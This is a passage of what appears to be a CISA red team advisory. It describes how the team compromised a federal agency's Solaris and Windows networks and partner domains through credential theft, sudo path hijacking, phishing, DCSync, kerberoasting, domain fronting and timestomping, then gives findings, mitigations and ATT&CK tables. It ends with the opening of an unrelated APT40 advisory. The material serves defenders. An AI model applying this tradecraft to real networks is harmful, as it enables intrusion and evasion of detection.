Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders.

To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated.

Full Enclave Compromise

Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007].

The harvested password granted unrestricted privileged access to the entire Solaris enclave.

Exploitation of the Windows Domain

While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4).

Figure 4: Exploitation of Solaris enclave

The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials.

Reconnaissance and Initial Access

While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation.

The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon.

Credentialed Access and Privilege Escalation

Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM).

Lateral Movement and Persistence

The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001].

The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004].

The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism.

The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts. 

The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5).

Figure 5: Exploitation of the Windows Domain

After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior.

Pivoting Into External Trusted Partners

The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally.

The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6).

figure 6: path of exploitation into external fceb organizations

These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors.

Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions.

Defense Evasion Techniques

Solaris Enclave Figure 5: Exploitation of the Windows Domain

Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run—full file path and any command line arguments are not recorded. For example:

  • A real file: /opt/splunkforwarder/bin/splunkd
  • A malicious copy: /opt/splunkforwarder/splunkd
  • Command auditing logs: splunkd

The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment.

Windows Domain

The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027].

Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised.

To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities.

All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection.

Collaborative Phase

Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity.

During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise:

  • EDR alerts;
  • YARA scans;
  • C2 domains and techniques;
  • Internal pivot hosts;
  • Admin accounts used to pivot;
  • Memory dumps, revealing attempts to pass credentials; and
  • Email logs documenting the initial breach via phishing.

Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps:

  • Command execution (initial access and lateral movement);
  • Establish C2 channels and exfiltrate data;
  • Establish persistence;
  • Escalate privileges; and
  • Use and abuse credentials.

All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs.

Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations.

Log Collection

The assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage.

The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses.

Forensic Analysis

Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses.

Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders—using either the native touch -r command or implants’ timestomp command to disguise the last-modified timestamp captured in the output of ls –la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation.

Reliance on Known IOCs

The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example:

  • After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team’s loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks.
  • Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team’s kerberoasting activity.
Regular Monitoring and Investigation Management

Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example:

  • While EDR products detected and quarantined several of the red team’s tools, including the initial phishing payload, the organization’s daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders’ daily workflows. This allowed SOC personnel to identify new attempts at lateral movement.
  • Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled. The organization’s technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology.
  • Network defenders had poor operational security and alerted the red team of investigations. For example:
    • In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed.
    • The red team observed system administrators reviewing forensic artifacts tied to the team’s Solaris payload—searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation.
  • IT teams were siloed from the SOC, who had no knowledge of the system administrator’s weeks long investigation into the anomalous network behavior.
  • While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments.
Sysmon Misconfigurations

The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations:

  • Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:\Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads.
  • Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events).
  • Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:\Program Files (x86)\Google\Update\*).

LESSONS LEARNED AND KEY FINDINGS

The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings.

Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity.

  • Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization’s hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports.
  • Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domain. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response.
  • Finding #3: The organization had trust relationships with multiple partner organizations, which—when combined with weak credentials and network connectivity—allowed the red team to exploit and move laterally to a partner domain controller. This highlights the risk of blindly allowing third party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material.
  • Finding #4: The organization’s defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation.
  • Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques nor were any alerts on anomalous behavior being monitored.
  • Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation.

Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs.

  • Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation.
  • Finding #8: Network defenders’ daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided a 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team’s activity.
  • Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering.

Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization’s network defenders.

  • Finding #10: The organization’s technical staff were spread across decentralized teams. Siloed team structure meant that IT, security, and other technical teams lacked consistency with their tools, creating too much noise for defenders to sift through.
  • Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering timeliness and maintenance of a defensive posture.
  • Finding #12: The organization’s forensics team produced an incident response report which documented the red team’s initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team’s ability to expand and persist. The success of the red team’s first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts and, by extension, the Windows environment. Moreover, the organization’s internal report only focused on vulnerable servers and did not account for a cyber threat actor’s ability to expand and persist in the Solaris enclave.
    • The Solaris administrator’s investigations of the red team failed to appear in either the report or in SOC deconflictions. An admin’s inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement.

Lesson Learned: A “known-bad” detection approach hampered detection of alternate TTPs.

  • Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization’s network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools, but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new “threat actor” with new TTPs sidestepped nearly all detections.
  • Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions.
  • Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, CISA red team, or adversaries. This also created excessive noise for defenders to effectively sift through to determine expected versus anomalous activity.
  • Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allow-listing.

NOTED STRENGTHS

The assessed organization promptly planned for and resolved multiple identified issues, including with:

  • Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary. There is an on-going effort to change service account passwords and apply DoD recommended STIG compliance (over 85 percent have been changed since the publication of this report).
  • IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity-based monitoring capabilities in front of tier zero assets.
  • Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet.
  • Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers of to identify anomalous instances.
  • Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations.
  • Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts.

MITIGATIONS

Network Defenders

CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Table 1: Recommendations to Mitigate Identified Issues
Finding Recommendation
Inadequate firewall between perimeter and internal devices
  • Deploy internal and external network firewalls to inspect, log, and/or block unknown or unauthorized traffic.
  • Perform deep packet inspection to detect mismatched application traffic or encrypted data flows.
  • Restrict outbound internet egress to hosts whenever possible.
  • Establish a baseline of normal user activity, including unique IPs or domains.
Insufficient Network Segmentation
  • Apply the principle of least privilege to limit the exposure of systems and services in the demilitarized zone (DMZ).
  • Segment the DMZ based on the sensitivity of systems and services as well as the internal network [CPG 2.F].
  • Segment networks to protect assets and workstations from direct exposure to the internet by considering the criticality of the asset to business functions, sensitivity of the data traversing the asset, and requirements for internet access to the asset.
  • Implement and regularly test firewalls, access control lists, and intrusion prevention systems.
  • Take advantage of opportunities to create natural network segmentation. Securely configured VPNs used for remote laptops, for instance, create an easy place to filter and monitor incoming traffic.
Trust relationships between domains were overly permissive
  • Restrict network connectivity (ingress and egress) to only necessary services between trusted domains [CPG 2.E].
  • Regularly monitor privileged access via Foreign Security Principals (FSPs).
Defensive activity was not sufficiently isolated
  • Perform network defense investigations out-of-band [CPG 3.A].
  • Conduct regular security audits and penetration testing by internal and external parties.
  • Develop and implement a comprehensive Incident Response Plan (IRP) and conduct regular drills and simulations [CPG 2.S].
IDM solutions were not fully understood and utilized
  • Enroll all accounts in IDM solutions and test against common credential manipulation techniques.
  • Integrate the IDM solution with other systems and applications, allowing for the streamlining of workflows.
Insufficient role-based host segmentation
  • Establish Role-Based Access Controls (RBAC) to systematically assign permissions based on job functions [CPG 2.E].
  • Implement a comprehensive security model incorporating micro-segmentation at the host level.
Failure to monitor EDR alerts daily
  • Develop and document Standard Operating Procedures (SOPs) for handling EDR alerts [CPG 5.A].
  • Establish and maintain incident response playbooks.
  • Conduct regular audits and reviews of the EDR alert handling process.
Host artifacts were overly trusted
  • Operationalize and deploy File Integrity Monitoring (FIM) solutions.
  • Regularly review and adjust access permissions, adhering to the principle of least privilege [CPG 2.E].
  • Establish proper forensic processes to ensure integrity.
Bureaucracy and decentralization of network defenders hampered communication and consistency
  • Introduce cross-training initiatives to cultivate a collaborative culture.
  • Encourage the establishment of cross-functional projects.
  • Utilize collaboration platforms that seamlessly integrate various tools and systems.
Insufficient internal incident response report 
  • Promote a culture of ongoing improvement while also fostering a proactive approach among employees to promptly report suspicious activities.
  • Treat suspected incidents of compromise as a confirmed breach, and account for a threat actor’s ability to move laterally when defining the scope of incident response efforts.
Focus on known/common IOCs
  • Employ centralized logging and tool-agnostic detection methods.
  • Leverage threat intelligence feeds by integrating them into a SIEM tool.
  • Implement regular updates for IOCs and TTPs, with the capability for customization to address the specific threat landscape [CPG 3.A].
Detection rules were visible from compromised systems
  • Integrate runtime detection mechanisms while removing world-readable configuration files from installer deployments where applicable.
Insufficient restriction of admin tools
  • Enhance security posture by implementing application allowlisting to ensure only trusted and approved applications are permitted [CPG 2.Q].
  • Apply the principle of least privilege by granting users only the minimum level of access necessary to perform job functions.
Insufficient tracking of software
  • Conduct a comprehensive inventory of assets and establish a baseline for behavior [CPG 1.A].
  • Utilize a Software Asset Management (SAM) solution that offers comprehensive tracking, reporting, and compliance management capabilities.
  • Deploy automated discovery and monitoring tools to continuously scan and identify new and existing software.

CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments.

Table 2: Recommendations to Mitigate Identified Issues
Issue Recommendation
Accounts were overprivileged and the organization’s network contained unnecessary service accounts
  • Apply the principle of least privilege when assigning permissions to user accounts. Audit existing group memberships, strip unnecessary privileges, and prune unnecessary nested groups/users.
  • Monitor for account lockout, especially on administrative accounts, and switch to a manual account unlock policy.
  • Increase monitoring for higher-risk accounts, such as service accounts, that are highly privileged and have a predictable pattern of behavior (e.g., scans that reliably run at a certain hour of the day).
  • Privileged users should have dedicated role-based user accounts and associated jump hosts to log into critical resources.
Insufficient EDR configuration
  • Ensure all hosts have a form of EDR installed.
  • Deploy an EDR capable of catching commonly known obfuscation or execution techniques.
Insecure and insufficient credentials

Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourage all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge.

Software Manufacturers

CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following:

  • Eliminate default passwords and determine what password practices should be required (such as minimum password length and disallowing known breached passwords). Configure software to use more secure authentication schemes by default.
  • Provide logging at no additional charge. Cloud services and on-premises products should commit to generating and storing security related logs at no additional cost.
  • Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. The goal is to develop logs that yield a comprehensive story of the event.
  • Remove unnecessary software dependencies. Unnecessary software increases the attack surface available to adversaries and may introduce additional vulnerabilities. Mitigating these additional vulnerabilities requires significant investment, consuming resources like time, technical personnel, and adding to the level of security effort.

These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. 

For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 3–11).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

VERSION HISTORY

July 11, 2024: Initial version.

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3–11 for all referenced threat actor tactics and techniques in this advisory.

Table 3: Reconnaissance
Technique Title ID Use
Search Victim-Owned Websites T1594 CISA’s red team used open source tools and services to probe the organization’s internet-facing presence and gather information, including names, roles, and contact information.
Gather Victim Network Information: DNS T1590.002 The red team gathered information about the organization’s DNS records, which revealed several details about the organization’s internal network.
Gather Victim Identity Information: Employee Names T1589.003 CISA’s red team collected the assessed organizations’ employee names to use their email addresses for specific targeting based on roles and responsibilities.
Gather Victim Org Information: Identity Roles T1591.004 CISA’s red team selected specific individuals from the assessed organization and targeted them with phishing payloads.
Table 4: Command and Control
Technique Title ID Use
Application Layer Protocol: Web Protocols T1071.001 The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports.
Non-Standard Port T1571 The red team used SSH over ports 80 and/or 443 when establishing outbound C2.
Proxy: Domain Fronting T1090.004 CISA’s red team leveraged domain fronting to redirect and obfuscate their traffic.
Table 5: Credential Access
Technique Title ID Use
Brute Force: Password Cracking T1110.002 The red team cracked an account’s password by using a common wordlist.
OS Credential Dumping: DCSync T1003.006 CISA’s red team pulled credentials for the domain via DCSync to gain full access to the domain.
Unsecured Credentials: Bash History T1552.003 The red team obtained a password by searching a user’s bash command history, which provided further unprivileged access throughout the network.
Table 6: Discovery
Technique Title ID Use
Domain Trust Discovery T1482 CISA’s red team inspected the assessed organization’s domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally.
File and Directory Discovery T1083 The red team data mined numerous internal servers and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts.
Table 7: Privilege Escalation
Technique Title ID Use
Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account’s password.
Access Token Manipulation: Token Impersonation/Theft T1134.001 CISA’s red team impersonated the tokens of current users to exploit valid sessions and bypass the organization’s IDM.
Access Token Manipulation: Make and Impersonate Token T1134.003 CISA’s red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges.
Table 8: Lateral Movement
Technique Title ID Use
Remote Services: SSH T1021.004 CISA’s red team used SSH with a valid account to move through the enclave.
Proxy T1090 The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic.
Use Alternate Authentication Material: Pass the Hash T1550.002 The red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using different hash types for authentication.
Use Alternate Authentication Material: Pass the Ticket T1550.003 CISA’s red team’s operations were hindered by the organization’s  IDM when it blocked the team’s attempts to bypass system access controls using Kerberos tickets for authentication.
Table 9: Collection
Technique Title ID Use
Data from Local System T1005 CISA’s red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc.
Table 10: Persistence
Technique Title ID Use
Scheduled Task/Job: Cron T1053.003 The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times.
Scheduled Task/Job: At T1053.002 CISA’s red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date.
Hijack Execution Flow: AppDomainManager T1574.014 The red team executed malicious payloads by hijacking how the .NETAppDomainManager loads assemblies.
Valid Accounts: Domain Accounts T1078.002 CISA’s red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain.
Table 11: Defensive Evasion
Technique Title ID Use
Masquerading: Masquerade Task or Service T1036.004 The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity.
Obfuscated Files or Information T1027 CISA’s red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network.
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification T1222.002 The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment.
Indicator Removal: Timestomp T1070.006 CISA’s red team modified file timestamps to hide their operational activity.

Source…

People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action


This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations.

